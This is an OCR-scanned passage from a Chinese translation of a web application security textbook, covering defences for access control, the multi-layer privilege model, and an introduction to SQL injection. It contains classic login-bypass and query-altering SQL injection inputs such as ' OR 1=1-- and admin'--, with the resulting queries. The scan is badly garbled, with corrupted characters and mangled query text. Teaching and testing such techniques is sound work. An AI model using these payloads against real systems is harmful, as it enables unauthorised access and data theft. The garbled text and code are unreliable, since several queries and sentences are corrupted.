口 通 过 用 户 会 话 做 出 所 有 访问 控制 决定 。 

口 使 用 一 个 中 央 应 用 程序 组 件 检 查访 问 控制 。 

口 通过 这 个 组 件 处 理 每 一 个 客户 端 请 求 ， 确 认 人 允许 提出 请 求 的 用 户 
访问 他 请 求 的 功能 和 资源 。 

口 使 用 编程 技巧 确保 前 面 的 方法 没有 例外 。 一 种 有 效 的 方法 是 规定 
每 个 应 用 程序 页 面 必 须 采 用 一 个 由 中 央 访 问 控制 机 制 查 询 的 界面 。 强 制 
开发 者 将 访问 控制 逻辑 代码 写 入 每 个 页 面 ， 不 得 找 借口 省 略 这 些 代 码 。 

口 对 于 特别 敏感 的 功能 ， 例 如 管理 页 面 ， 可 以 通过 IP 地 址 进一步 限 
制 访问 ， 确 保 只 有 特殊 网 络 范 围 内 的 用 户 能 够 访问 这 些 功能 ， 不 管 他 们 


口 如 果 静 态 内 容 需 要 得 到 保护 ， 有 两 种 方法 可 提供 访问 控制 。 首 
先 ， 用 户 可 通过 回执 行 相 关 访 问 控制 逻辑 的 服务 需 端 动态 页 面 传送 一 个 
文件 名 ， 间 接 访 问 静 态 文 件 。 其 次 ， 可 通过 使 用 HTTP 验 证 或 应 用 程序 









































服务 器 的 其 他 特性 隐藏 进入 的 请 求 ， 并 在 允许 访问 前 检查 资源 许可 ， 控 
制 用 户 直 接 访 问 静 态 文 件 。 

口 无 论 何 时 通过 客户 站 传送， 指定 用 户 所 和 希望 访问 资源 的 标识 符 都 
容易 直到 自 改 。 服 务 器 应 只 信任 完整 的 服务 器 端 数据 。 任 何 时 候 通过 客 
户 端 传送 这 些 标识 符 ， 都 需要 对 它们 进行 重新 确认 ， 以 确保 用 户 拥有 访 
问 被 请 求 资 源 的 授权 。 

口 对 于 安全 性 很 关键 的 应 用 程序 功能 〈 如 在 银行 应 用 程序 中 创建 一 
个 新 的 汇 球 收 藉 人 )〉 考虑 对 每 笔 交 易 执 行 章 复 验 证 和 双重 授权 ， 进 一 步 
确保 该 功能 不 会 被 未 授权 方 使 用 。 这 样 做 还 可 以 减轻 其 他 可 能 的 攻击 
《如 会 话 劫持 ) 造成 的 后 果 。 

口 记 录 每 一 个 访问 敏感 数据 或 执行 敏感 操作 的 事件 。 这 些 记 录 有 助 
于 检测 并 调查 潜在 的 访问 控制 违反 事件 。 

Web 应 用 程序 开 及 者 通 闻 逐 步 执行 访问 控制 功能 ， 在 他 们 发 现 需要 
访问 控制 的 每 个 页 面 插入 代码 ， 并 在 不 同 的 页 面 间 筋 切 和 粘贴 相同 的 代 
码 以 满足 类 似 的 需求 。 这 种 方法 会 在 建立 的 访问 控制 机 制 中 引入 内 在 的 
缺陷 : 许多 需要 访问 控制 的 情况 被 忽略 ;为 一 个 区 域 设 计 的 控制 可 能 并 
不 适用 于 男 一 个 区 域 ， 在 应 用 程序 其 他 地 方 所 做 的 修改 可 能 会 由 于 违反 
开发 者 做 出 的 假设 而 与 现 有 控制 机 制 相互 冲突 。 

与 这 种 方法 相 比 ， 前 面 描述 的 使 用 中 央 应 用 程序 组 件 实施 访问 控制 
的 方法 具有 谱 多 优点 。 

口 它 可 增进 应 用 程序 访问 控制 的 透明 度 ， 使 得 不 同 开发 者 能 够 迅速 
理解 其 他 人 执行 的 控制 机 制 。 
口 它 可 提高 访问 控制 的 可 维护 性 。 许 多 变更 只 需要 在 一 个 共享 的 组 
件 中 应 用 一 次 即 可 ， 不 需要 将 代码 硼 切 并 粘贴 到 多 个 位 置 。 
口 它 可 改善 可 适应 性 。 如 果 出 现 新 的 访问 控制 有 要求， 这 些 要 求 可 芯 
即 反 映 到 由 每 个 应 用 程序 页 面 执 行 的 一 个 现 有 API 中 。 

ZD o 
多 层 权 限 模型 

与 访问 有 关 的 问题 不 仅 适 用 于 Web 应 用 程序 ， 而 且 也 适用 于 其 中 的 
其 他 基础 设施 ， 特 别 是 应 用 程序 服务 器 、 数 据 库 和 操作 系统 。 采 取 深 层 
安全 措施 需要 在 上 述 每 一 个 层面 执行 访问 控制 ， 建 立 几 层 保 护 。 这 样 做 
可 以 强化 对 未 授权 访问 威胁 的 防御 ， 因 为 即使 攻击 者 攻破 一 个 层面 的 防 
御 ， 也 会 被 其 他 层面 的 防御 机 制 阻止 。 

除 上 文 所 述 的 在 Web 应 用 程序 中 执行 有 效 的 访问 控制 外 ， 还 可 以 通 
过 各 种 方式 将 这 种 多 层次 的 方法 应 用 于 应 用 程序 的 基础 组 件 中 ， 举 例如 
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口 可 根据 在 应 用 程序 服务 器 层面 定义 的 用 户 角色 ， 使 用 应 用 程序 服 
务 吉 对 完整 URL 路 径 实施 访问 控制 。 

口 当 执 行 其 他 用 户 的 操作 时 ， 应 用 程序 可 使 用 一 个 不 同 的 数据 库 账 
户 。 应 为 仅 需 碍 询 《〈 而 非 更 新 ) 数据 的 用 户 提 供 一 个 只 读 权 限 账 户 。 

O 应 使 用 一 个 权限 表 ， 对 数据 库 中 不 同 的 数据 库 表 执行 严格 的 访问 











口 用 于 运行 基础 设施 中 每 个 组 件 的 操作 系统 账户 只 需 分 配 组 件 实际 
需要 的 最 低 权限 。 

复杂 的 安全 性 能 关键 的 应 用 程序 可 通过 一 个 定义 应 用 程序 不 同 用 户 
角色 和 不 同 权限 的 矩阵 来 帮助 实施 这 种 多 层 防御 措施 。 在 每 一 个 层面 ， 
应 将 不 同 的 权限 分 配给 每 一 个 角色 。 图 8-6 是 一 个 复杂 应 用 程序 的 一 部 
分 权限 矩阵 。 
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图 8-6 一 个 复杂 应 用 程序 权限 矩阵 实例 









































我 们 可 以 在 这 种 安全 模型 中 应 用 各 种 有 益 的 访问 控制 概念 。 

O 编 程控 制 (programmatic control) 。 数 据 库 权 限 和 矩阵 保存 在 一 个 
数据 库 表 中 ， 并 以 编程 的 形式 来 做 出 访问 控制 决定 。 对 用 户 角色 进行 分 
类 可 以 简化 某 些 访问 控制 检查 ， 这 一 任务 同样 可 以 通过 编程 来 完成 。 编 
nner 并 可 能 在 应 用 程序 中 建立 非常 复杂 的 访问 控制 多 
Ho 

O 自主 访问 控制 (Discretionary Access Control, DAC) 。 使 用 自主 
访问 控制 ， 管 理 员 可 将 自己 的 权限 分 配给 其 他 与 拥有 特殊 资源 有 关 的 用 
户 。 在 封 财 型 DAC 模 型 中 ， 除 非 明 确 许 可 ， 人 否则 拒绝 访问 。 管 理 员 还 可 

















以 锁定 或 终止 某 个 用 户 账 户 。 在 开放 型 DAC 模 型 中 ， 除 非 明确 废除 许 
可 ， 人 否则 允许 访问 。 各 种 应 用 程序 用 户 有 权 创 建 用 户 账户 ， 并 再 次 应 用 
自主 访问 控制 。 

口 基 于 角色 的 访问 控制 CRole-Based Access Control, RBAC) 。 这 
种 控制 使 用 许多 命名 的 角色 ， 每 个 角色 拥有 各 不 相同 的 特殊 权限 ; 每 个 
用 户 分 配 有 一 个 这 样 的 角色 。 这 样 做 可 简化 不 同 权限 的 分 配 与 实施 ， 并 
有 助 于 管理 复杂 应 用 程序 中 的 访问 控制 。 使 用 角色 对 用 户 请 求 执行 “前 
沿 ?访问 检查 有 助 于 实行 最 少量 的 处 理 迅速 拒绝 许多 未 授权 的 请 求 。 对 
特殊 用 户 可 访问 的 URL 路 径 加 以 保护 就 是 这 种 方法 的 一 个 典型 应 用 。 

当 设 计 基 于 角色 的 访问 控制 机 制 时 ， 我 们 有 必要 限制 角色 的 数 
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角色 ， 那 么 由 于 不 同 角 色 的 数目 繁多 ， 可 能 就 很 难 对 其 进行 有 
效 管理 。 如 果 建 立 太 少 的 角色 ， 这 些 角 色 就 只 能 对 访问 进行 粗 
略 管理 ， 个 体 用 户 分 配 到 的 权限 将 不 足以 履行 他 们 的 职能 。 

如 果 使 用 平台 级 控制 、 基 于 HTTP 方 法 和 URL 限 制 对 不 同 应 用 
程序 角色 的 访问 ， 则 应 将 这 些 控制 设计 为 使 用 默认 拒绝 模式 ， 
因为 这 是 防火 墙 规则 的 最 佳 做 法 。 这 其 中 应 包括 各 种 特定 规 
则 ， 用 于 将 某 些 HTTP 方 法 和 URL 分 配给 特定 角色 ， 而 且 ， 随 
后 的 规则 应 拒绝 不 符合 前 一 规则 的 任何 请 求 。 

口 声 明 式 控制 (declarative control) 。 应 用 程序 使 用 有 限 的 数据 库 
账户 访问 数据 库 。 它 对 不 同 的 用 户 群 体 使 用 不 同 的 账户 ， 每 个 账户 分 配 
到 执行 该 群体 所 允许 执行 的 操作 所 必需 的 最 低 权 限 。 这 种 声明 式 控制 从 
应 用 程序 以 外 进行 声明 。 这 是 深层 防御 原理 的 一 个 非常 有 用 的 应 用 ， 
为 权限 是 由 另外 一 个 组 件 贱 了 予 应 用 程序 的 。 这 样 ， 即 使 一 名 用 户 突 破 在 
应 用 程序 层面 执行 的 访问 控制 ， 企 图 实施 添加 新 用 户 之 类 的 敏感 操作 ， 
他 仍然 会 被 阻止 ， 因 为 他 使 用 的 数据 库 账 户 并 未 在 数据 库 内 获得 必要 的 


权限 。 
另 一 种 情况 是 在 配置 应 用 程序 的 过 程 中 ， 通 过 配置 摘 述 符 文 件 
(descriptor file) 在 应 用 程序 服务 器 层面 上 应 用 声明 式 访问 控 
制 。 但 是 ， 这 种 应 用 一 般 相 对 简单 ， 并 且 无 法 进行 扩展 ， 所 以 
无 法 省 理 大 型 应 用 程序 中 种 类 繁多 的 权限 。 


























渗透 测试 步 又 


如 果 攻 击 一 个 采用 这 种 多 层 权 限 模 型 的 应 用 程序 ， 可 能 这 个 应 
用 程序 能 够 防御 在 应 用 访问 控制 过 程 中 常 犯 的 许多 明显 错误 。 由 于 
在 其 他 层面 实施 的 保护 措施 ， 避 开 应 用 程序 的 访问 控制 可 能 无 法 取 
得 很 大 成 效 ， 但 仍然 可 以 使 用 其 他 可 能 的 攻击 手段 。 更 重要 的 是 ， 
了 解 每 种 控制 在 它 所 能 提供 的 保护 方面 存在 的 限制 ， 将 有 助 于 确定 
最 可 能 影响 到 它 的 漏洞 。 

o 应 用 程序 层面 的 编程 检查 易于 受到 注入 类 攻击 。 
、， 口 在 应 用 程序 服务 器 层面 定义 的 角色 ， 其 定义 既 不 全 面 ， 也 不 
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口 即使 使 用 低 权 限 操作 系统 账户 运行 应 用 程序 组 件 ， 这 些 账户 
通常 仍然 能 够 阅读 主机 文件 系统 中 保存 的 各 种 敏感 数据 。 任 何 准 许 
他 人 访问 任意 文件 的 漏洞 “即使 仅仅 读 取 敏感 数据 ) 都 可 被 攻击 者 
加 以 有 效 利用 。 

口 应 用 程序 服务 右 软 件 本 寻 存 在 的 漏洞 往往 有 助 于 突破 应 用 程 
的 任何 访问 控制 ， 但 是 仍然 只 能 有 限 地 访问 数据 库 和 操 

日 在 适当 位 置 的 一 个 可 供 利用 的 访问 控制 漏洞 可 成 为 发 动 重大 
权限 提升 攻击 的 起 点 。 例 如 ， 如 果 能 够 修改 与 账户 有 关 的 角色 ， 那 
再 次 使 用 账户 登录 将 能 够 提升 在 应 用 程序 和 数据 库 层面 的 访问 权 
限 。 








8.4 小结 


访问 控制 缺陷 可 能 以 各 种 形式 表现 出 来 。 有 些 时 候 ， 它 们 可 能 并 没 
有 利用 价值 ， 人 允许 访 问 不 能 进一步 提升 权限 的 “无 害 ” 功 能 。 其 他 情况 
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造成 访问 控制 缺陷 的 来 源 各 和 寞 : 设计 糟糕 的 应 用 程序 很 难 或 无 法 检 
汕 出 未 授权 访问 ， 一 个 简单 的 牙 名 可 能 会 使 一 两 项 功能 未 受到 保护 ， 或 
者 对 用 户 行 为 的 错误 假设 也 可 能 会 给 应 用 程序 造成 防御 漏洞 。 

许多 时 候 ， 突 破 访问 控制 非常 容易 ， 只 需 请 求 一 个 常用 的 管理 URL 
就 可 以 直接 访问 相关 功能 。 但 是 ， 有 时 突破 访问 控制 也 可 能 非常 困难 ， 
一 些 细 微 的 缺陷 可 能 在 应 用 程序 之 中 隐藏 得 较 深 ， 特 别 是 在 复杂 、 高 度 
安全 的 应 用 程序 中 。“ 四 处 查看 ”是 攻击 访问 控制 的 最 有 效 方法 。 如 果 想 
努力 取得 进展 ， 渗 透 测试 员 应 该 耐心 测试 应 用 程序 的 每 一 项 功能 ， 也 许 
不 久 就 可 以 发 现 一 个 能 攻破 整个 应 用 程序 的 缺陷 。 




















8.5 问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/ywahh。 

(1) 一 个 应 用 程序 可 能 通过 使 用 HTTP Referer 消 息 头 实施 访问 控 
制 ， 但 它 的 正 弟 行为 并 没有 公开 表露 这 一 点 。 如 何 检测 出 这 种 缺陷 ? 

(2) 登录 一 个 应 用 程序 后 ， 被 重 定 疝 到 以 下 URL: 

https://wahh-app.com/MyAccount.php?uid=1241126841 

应 用 程序 似乎 辐 MyAccount.php 页 面 提 交 一 个 用 户 标 识 符 。 已 知 的 
唯一 标识 符 是 自己 的 标识 人 符 。 如 何 测 试 应 用 程序 是 否 使 用 这 个 参数 以 不 
安全 的 方式 实施 访问 控制 ? 

(3) 因特网 上 的 一 个 Web 应 用 程序 通过 检查 用 户 的 来 源 IP 地 址 实 
施 访问 控制 。 为 什么 这 种 行为 可 能 存在 缺陷 ? 

(4) 某 应 用 程序 的 唯一 目的 是 为 公众 提供 可 搜索 的 信息 仓库 。 该 
人 该 应 用 程序 应 执行 何 种 访 
问 控制 ? 

(5) 在 浏览 一 个 应 用 程序 的 过 程 中 遇 到 几 个 应 防止 未 授权 访问 的 
敏感 资源 ， 它 们 的 文件 扩展 名 为 .xls。 这 种 情况 为 何 应 立 即 引 起 注意 ? 
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几乎 所 有 应 用 程序 都 依赖 数据 存储 区 来 管理 在 应 用 程序 中 处 理 的 
数据 。 在 许多 情况 下 ， 这 些 数据 负责 处 理 核心 应 用 程序 逻辑 、 保 存 用 户 
账户 ”权限 、 应 用 程序 配置 设置 等 。 现 在 ， 数 据 存储 区 已 不 理 只 是 被 动 
的 数据 容器 ”大 多 数 数据 存储 区 都 保存 有 结构 化 、 可 以 使 用 预先 定义 的 
查询 格式 或 语 守 访问 的 数据 ， 并 包含 内 部 逻辑 来 管理 这 些 数据 。 

通常 ， 应 用 程序 使 用 常用 的 权限 级 别 来 管理 对 数据 存储 区 的 各 种 访 
问 操作 ， 以 及 处 理 属于 不 同 应 用 程序 用 户 的 数据 。 如 果 攻 击 考 能 够 破坏 
应 用 程序 与 数据 存储 区 的 交互 ， 使 应 用 程序 检索 或 修改 各 种 数据 ， 屠 
么 ， 攻 击 者 就 可 以 避 开 在 应 用 层次 对 数据 访问 实施 的 任何 控制 。 

上 述 原则 适用 于 任何 类 型 的 数据 存储 技术 。 因 为 本 书 是 一 本 实用 手 
册 ， 我 们 将 主要 讨论 利用 现实 世界 的 应 用 程序 中 存在 的 漏洞 时 所 怖 的 知 
识 和 技巧 。 迄 今 为 止 最 常用 的 数据 存储 区 是 SQL 数 据 库 、 甘 于 XML 的 资 
料 库 、LDAP 目 录 ， 以 及 一 些 常见 的 示例 - 

在 讨论 这 些 主要 示例 时 ， 我 们 将 介绍 你 在 确定 并 利用 这 些 缺 陷 时 可 
以 采取 的 实用 步骤 。 每 一 种 新 型 注入 攻击 都 需要 结合 概念 加 以 理解 。 党 
握 利用 这 些 候 陷 的 基础 知识 后 ， 如 果 再 遇 到 一 种 新 型 注入 攻击 ， 你 就 能 
够 自信 地 应 用 这 些 知识 ， 设 计 出 其 他 攻击 方法 ， 向 其 他 人 已 经 研究 过 的 
漏洞 发 动 攻击 。 





























解释 型 语言 Cinterpreted language) 是 一 种 在 运行 时 由 一 个 运行 时 组 
件 (runtime component) 解释 语言 代码 并 执行 其 中 包含 的 指令 的 语言 。 
与 之 相对 ， 编 译 型 语言 (compiled language) 是 这 样 一 种 语言 : 它 的 代 
码 在 生成 时 转换 成 机 器 指令 ， 然 后 在 运行 时 直接 由 使 用 该 语言 的 计算 机 
处 理 右 执行 这 些 指 令 。 

从 理论 上 说 ， 任 何 语言 都 可 使 用 编译 器 或 解释 器 来 执行 ， 这 种 区 别 
并 不 是 语言 本 身 的 内 在 特性 。 但 是 ， 通 常 大 多 数 语 言 仅 通 过 上 述 其 中 一 
种 方式 执行 ， 开 发 Web 应 用 程序 使 用 的 许多 核心 语言 使 用 解释 器 执行 ， 
包括 SQL、LDAP、Perl 和 PHP。 

基于 解释 型 语言 的 执行 方式 ， 产 生 了 一 系列 叫做 代码 注入 《code 
injection) 的 漏洞 。 任 何 有 实际 用 途 的 应 用 程序 都 会 收 到 用 户 提 交 的 数 
据 ， 对 其 进行 处 理 并 执行 相应 的 操作 。 因 此 ， 由 解释 器 处 理 的 数据 实际 
上 是 由 程序 员 编 写 的 代码 和 用 户 提交 的 数据 共同 组 成 的 。 有 些 时 候 ， 攻 
击 者 可 以 提交 专门 设计 的 输入 ， 通 常 提交 某 个 在 应 用 程序 中 使 用 解释 型 
语言 语法 的 具有 特殊 意义 的 句法 ， 同 应 用 程序 实施 攻击 。 结 果 ， 这 个 输 
入 的 一 部 分 被 解释 成 程序 指令 执行 ， 好 像 它们 是 由 最 初 的 程序 员 编 写 的 
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另 一 方面 ， 在 编译 型 语言 中 实施 由 在 执行 任意 命令 的 攻击 往往 非常 
困难 。 这 时 ， 注 入 代码 的 方法 通常 并 不 利用 开发 目标 程序 所 使 用 语言 的 
任何 语法 特性 ， 注 入 的 有 效 载 奏 为 机 占 代 人 码 ， 而 不 是 用 那 种 语言 编写 的 
指令 。 请 参阅 第 16 章 了 解 各 种 针对 编译 软件 的 常见 攻击 。 


避 开 登录 


无 论 访问 操作 是 由 普通 用 户 还 是 应 用 程序 管理 员 触 发 ， 应 用 程序 访 
问 数据 存储 区 的 过 程 都 大 致 相同 。Web 应 用 程序 对 数据 存储 区 实施 自主 
访问 控制 ， 构 造 得 询 基于 用 户 的 账户 和 类 型 来 检索 、 添 加 或 修改 数据 存 
储 区 中 的 数据 。 修 改 香 询 《〈 不 只 是 查询 中 的 数据 ) 的 成 功 注 入 攻击 可 以 
避 开 应 用 程序 的 上 自主 访问 控制 并 获取 未 授权 访问 。 

如 果 需 要 安全 保护 的 应 用 程序 逻辑 由 但 询 结果 控制 ， 攻 击 者 就 可 以 
通过 修改 得 询 来 更 改 应 用 程序 的 逻辑 。 举 一 个 典型 的 例子 一 一 在 后 端 数 
据 存 储 区 的 用 户 表 中 碍 询 与 用 户 提供 的 证 书 匹 配 的 记录 。 许 多 实施 基于 









































表单 的 登录 功能 的 应 用 程序 使 用 数据 库 来 存储 用 户 证 书 ， 并 执行 简单 的 
SQL 查 询 来 确认 每 次 登录 尝试 。 以 下 是 一 个 典型 的 示例 : 

这 个 查询 要 求 数据 库 检 查 用 户 表 中 的 每 一 行 ， 提 取出 每 条 username 
列 值 为 marcus、password 列 值 为 secret 的 记录 。 如 果 应 用 程序 收 到 一 名 用 
P 登录 尝试 将 取得 成 功 ， 应 用 程序 将 为 该 用 户 建 立 一 个 通过 验 
证 的 会 1 

A gle i elec il 
执行 的 查询 ， 从 而 破坏 它 的 逻辑 。 例 如 ， 如 采 攻 击 者 知道 应 用 程序 管 
员 的 用 户 名 为 admin， 那 么 他 就 可 以 通过 提交 以 下 用 户 名 和 任意 密码 ， 
以 管理 员 喘 份 登录 : 

admin' 

应 用 程序 将 执行 以 下 查询 : 

SER TERES (> RAE 


于 是 这 个 查询 ZREN 了 密码 检查 。 
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假如 攻击 者 不 知道 管理 员 的 用 户 名 ， 该 如 何 实施 攻击 呢 ? ERKE 
应 用 程序 中 ， 数 据 库 的 第 一 个 账户 为 管理 有 用户， 因为 这 个 账户 通常 手工 
创建 ， 然 后 再 通过 它 生成 其 他 应 用 程序 账户 。 而 且 ， 如 果 碍 询 返 回 儿 名 
用 户 的 资料 ， 许 多 应 用 程序 只 会 处 理 第 一 名 用 户 。 因 此 ， 攻 击 者 可 利用 
和 





' OR 1=1-- 


应 用 程序 将 执行 以 下 查询 : 


SELECT * FROM users WHERE username = OR i=] ' AND password = ‘foo’ 
因为 其 中 使 用 了 注释 符号 ， 上 面 的 查询 等 同 于 : 
SELECT * FROM users WHERE username = '' OR 1=1 


该 查询 将 返回 全 部 应 用 程序 用 户 的 资料 。 


a S 
SA 

注解 ”注入 解释 型 语言 来 更 改 应 用 程序 逻辑 是 一 种 常用 的 
攻击 拉 巧 。LDAP 查 询 、XPath 但 询 、 消 恩 序列 实施 或 任何 定制 的 查 
询 语言 中 都 可 能 出 现 对 应 的 漏洞 。 








渗透 测 试 步 又 


解释 型 语言 注入 是 一 个 非常 宽泛 的 主题 ， 涵 盖 许 多 不 同 种 类 的 
漏洞 ， 并 可 能 影响 Web 应 用 程序 文 持 基础 架构 中 的 每 一 个 组 件 。 检 
测 并 利用 代码 注入 缺陷 的 详细 步 又 取决 于 攻击 所 针对 的 是 何 种 语 
言 ， 以 及 应 用 程序 开发 者 使 用 了 什么 编程 技巧 。 但 也 有 一 些 适 用 于 
各 种 情形 的 常规 方法 ， 如 下 所 示 。 

(1) 提交 可 能 在 解释 型 语言 中 引发 问题 的 无 效 语法 。 

(2) 确定 应 用 程序 响应 中 可 能 表示 存在 代码 注入 漏洞 的 任何 
有 反常 现象 。 

(3) 如果 收 到 任何 错误 消息 ， 分 析 这 些 消 轧 ， 获 得 与 服务 器 
上 发 生 的 问题 有 关 的 证 据 。 

(4) 如 有 必要 ， 系 统 性 地 修改 初始 输入 ， 尝 试 确 定 或 否定 最 
初 假 设 的 漏洞 诊断 。 

(5) 构造 一 个 概念 验证 测试 (proof-of-concept test) ， 使 安全 
命令 以 可 证 实 的 方式 执行 ， 得 出 结论 以 证 明 应 用 程序 中 存在 一 个 可 
被 利用 的 代码 注入 漏洞 。 
ag (6) 利用 目标 语言 和 组 件 的 功能 实现 攻击 目标 ， 对 漏洞 加 以 

| 用。 














9.2 注入 SQL 


几乎 每 一 个 web 应 用 程序 都 使 用 数据 库 来 保存 操作 所 需 的 各 种 信 

。 例 如 ， 网 上 和 零售 了 商 所 用 的 Web 应 用 程序 使 用 数据 库 保 存 以 下 信息 : 

口 用 户 账 户 、 证 书 和 个 人 信息 ; 

口 所 销售 商品 的 介绍 与 价格 ; 

口 订单 、 账 单 和 支付 细 市 ; 

口 每 名 应 用 程序 用 户 的 权限 。 

数据 库 中 的 信息 通过 SQL (Structured Query Language， 结 构 化 查询 
语言 ) 访问 。SQL 可 用 于 读 取 、 下 新 、 增 加 或 删除 数据 库 中 保存 的 信 


SQL 是 一 种 解释 型 语言 ，Web 应 用 程序 经 常 建立 合并 用 户 提 交 的 数 
据 的 SQL 语 句 。 因 此 ， 如 果 建 立 语句 的 方法 不 安全 ， 那 么 应 用 程序 可 能 
易于 受到 SQL 注 入 攻击 。 这 种 缺陷 是 困扰 Web 应 用 程序 的 最 由 名 昭著 的 
漏洞 之 一 。 在 最 严重 的 情形 中 ， 匿 名 攻击 者 可 利用 SQL 注入 读 取 并 修改 
数据 库 中 保存 的 所 有 数据 ， 甚 至 完全 控制 运行 数据 库 的 服务 器 。 

随 着 Web 应 用 程序 安全 意识 的 日 渐 增 强 ，SQL 注 入 漏洞 越 来 越 少 ， 
同时 也 变 得 更 加 难以 检测 与 利用 。 许 多 主流 应 用 程序 采用 API 来 避免 
SQL 注入 ， 如 果 使 用 得 当 ， 这 些 API 能 够 有 效 阻 止 SQL 注 入 攻击 。 在 这 
些 情况 下 ， 通 常 只 有 在 无 法 应 用 这 些 防 御 机 制 时 ，SQL 注 入 才 会 发 生 。 
有 了 时， 查找 SQL 注 入 漏洞 是 一 项 艰难 的 任务 ， 需 要 测试 员 坚 持 不 懈 地 在 
应 用 程序 中 探查 一 两 个 无 法 应 用 常规 控制 的 实例 。 

随 着 这 种 趋势 的 变化 ， 查 找 并 利用 SQL 注 入 漏洞 的 方法 也 在 不 断 改 
进 ， 通 常 使 用 更 加 微妙 的 漏洞 指标 以 及 更 加 完善 与 强大 的 利用 技巧 。 我 
们 首先 分 析 最 基本 的 情况 ， 然 后 进一步 描述 最 新 的 盲目 检测 与 利用 技 


巧 。 

有 大 量 广泛 的 数据 库 可 为 Web 应 用 程序 提供 文 持 。 虽 然 对 绝 大 多 数 
数据 库 而 言 ，SQL 注 入 的 基本 原理 大 体 相 似 ， 但 它们 之 间 也 存在 着 许多 
差异 ， 包 括 语法 上 的 细微 变化 以 及 可 能 影响 攻击 者 所 使 用 的 攻击 类 型 的 
巨大 行为 与 功能 差异 。 受 篇 幅 和 个 人 经 验 所 限 ， 在 下 面 的 示例 中 ， 我 们 
仅 讨 论 3 种 最 常用 的 数据 库 ， 即 Oracle、MS-SQL 和 MySQL。 在 适当 的 情 
况 下 ， 我 们 将 主要 讨论 这 3 种 平台 之 间 的 区 别 。 掌 握 这 些 技术 后 ， 就 可 
ee Ee on ee eee 
洞 。 





cl 























V 提示 “许多 时 候 ， 访 问 和 目标 应 用 程序 所 使 用 数据 库 相 同 
的 、 在 本 地 安装 的 数据 库 会 有 极 大 帮助 。 通 常 ， 只 需 修改 一 个 语法 
或 者 参考 一 个 内 置 表 或 功能 就 可 实现 自己 的 目的 。 从 目标 应 用 程序 
收 到 的 响应 一 般 并 不 完整 或 者 含义 模糊 ， 需 要 猜测 才能 理解 。 如 果 
陛 交 又 参 考 相同 数据 库 的 一 个 完全 “透明 "运行 的 版 本 ， 理 解 起 来 
容易 得 多 。 

如 果 这 种 方法 不 可 行 ， 最 好 找 一 个 可 以 进行 测试 的 适当 交 
互 式 在 线 环境 ， 如 SQLzoo.net 中 的 交互 式 在 线 教 程 











下 面 以 一 个 书籍 零售 商 使 用 的 Web 应 用 程序 为 例 ， 该 应 用 程序 允许 
用 户 根据 作者 、 书 名 、 出 版 商 等 信息 搜索 产品 。 完 整 的 书籍 目录 保存 在 
en 
籍 4 Bho 
_， 当 一 名 用 户 搜索 由 Wiley 出 版 的 所 有 书籍 时 ， 应 用 程序 执行 以 下 得 


询 : 








SELECT author,title, year FROM books WHERE publisher = ‘Wiley' and 

该 查询 要 求 数据 库 检查 书籍 表 的 第 一 行 ， 提 取 每 条 publisher 列 为 
Wiley 值 的 记录 ， 并 返回 所 有 这 些 记录 。 然 后 应 用 程序 处 理 这 组 记录 ， 
并 通过 一 个 HTML 页面 将 结果 显示 给 用 户 。 

在 这 个 查询 中 ， 等 号 左边 的 词 由 SQL 关键 字 、 表 和 数据 库 列 名 称 构 
成 。 这 个 部 分 的 全 部 内 容 由 程序 员 在 创建 应 用 程序 时 建立 。 当 然 ， 表 达 
式 Wiley 由 用 户 提交 ， 它 是 一 个 数据 项 。SQL 碍 询 中 的 字符 串 数 据 必 须 
包含 在 单 引 号 内 ， 与 查询 的 其 他 内 容 分 隔 开 来 。 

现在 思考 一 下 ， 如 果 用 户 搜索 所 有 由 OReily 出 版 的 书籍 ， 会 出 现 
什么 情况 。 应 用 程序 将 执行 以 下 查询 : 

SELECT author,title,year FROM books WHERE publisher = 'O'Reilly' and 


oublished-1 


在 这 个 示例 中 ， 碍 询 解释 器 以 和 前 面 一 个 示例 相同 的 方式 到 达 字 符 
串 数 据 位 置 。 它 解析 这 个 包含 在 单 引 号 中 的 数据 ， 得 到 值 0。 然 后 遇 到 
表达 式 Reilly'， 这 并 不 是 有 效 的 SQL 语法 ， 因 此 应 用 程序 生成 一 条 错误 





Incorrect syntax near 'Reilly'. 
Server: Msg 105, Level 15, State 1, Line 1 
Unclosed quotation mark before the character string ' 

如 条 应 用 程序 以 这 种 方式 运行 ， 那 么 它 非常 容易 中 到 SQL 注入 。 攻 
击 者 可 提交 包含 引号 的 输入 终止 他 控制 的 字符 串 ， 然 后 编写 任意 的 SQL 
修改 开发 者 想 要 应 用 程序 执行 的 查询 。 例 如 ， 在 这 个 示例 中 ， 攻 击 者 可 
以 对 得 询 进 行 修 改 ， 通 过 输入 以 下 搜索 项 ， 返 回 零售 商 目 录 中 的 每 一 本 
书籍 。 

Wiley' OR 1=1-- 

应 用 程序 将 执行 以 下 查询 : 


SELECT author,title,year FROM books WHERE publisher = 'Wiley' OR 














=1--' and published=1 

这 个 查询 对 开发 者 查询 中 的 WHERE 子 句 进行 修改 ， 增 加 了 另外 一 
个 条 件 。 数 据 库 将 检查 书籍 表 的 每 一 行 ， 提 取 publisher 列 值 为 Wiley 或 其 
| 

WK 0 

攻击 者 的 输入 中 的 双 连 字符 在 SQL 中 是 一 个 有 意义 的 表达 式 ， 它 告 
诉 碍 询 解释 器 该 行 的 其 他 部 分 属于 注释 ， 应 被 忽略 。 在 一 些 SQL 注 入 攻 
击 中 ， 这 种 技巧 极其 重要 ， 因 为 它 允 许 忽略 由 应 用 程序 开发 者 建立 的 得 
询 的 剩余 部 分 。 在 上 面 的 示例 中 ， 应 用 程序 将 用 尸 提 交 的 字符 串 包含 在 
单 引 号 中 。 因 为 攻击 者 已 经 终止 他 控制 的 字符 串 并 注入 其 他 一 些 SQL， 
他 需要 处 理 字 符 串 末尾 部 分 的 引号 ， 避 人 免 出 现 和 O'Reilly 示 例 中 相同 的 
语法 错误 。 攻 击 者 通过 添加 一 个 双 连 字符 达到 这 一 目的 ， 将 合 询 的 剩余 
部 分 以 注释 处 理 。 在 MySQL 中 ， 需 要 在 双 连 字符 后 加 入 一 个 空格 ， 或 
PH FF STEELE -o 

原始 查询 还 将 访问 仅 限 于 已 出 版 的 书籍 ， 因 为 它 指定 and 
published=1。 通 过 注入 注释 序 列 ， 攻 击 者 获得 未 授权 访问 权限 ， 可 以 返 
回 所 有 书籍 (包括 已 出 版 及 其 他 书籍 的 详细 信息 。 




















YY 提示 有 些 时 候 ， 可 以 不 使 用 注释 符号 处 理 字 符 串 末尾 音 
分 的 引号 ， 而 用 一 个 需要 引号 包含 的 字符 串 数据 结束 注入 的 输入 ， 


以 此 “平衡 引号 ”。 例 如 ， 输 入 以 下 搜索 项 : 


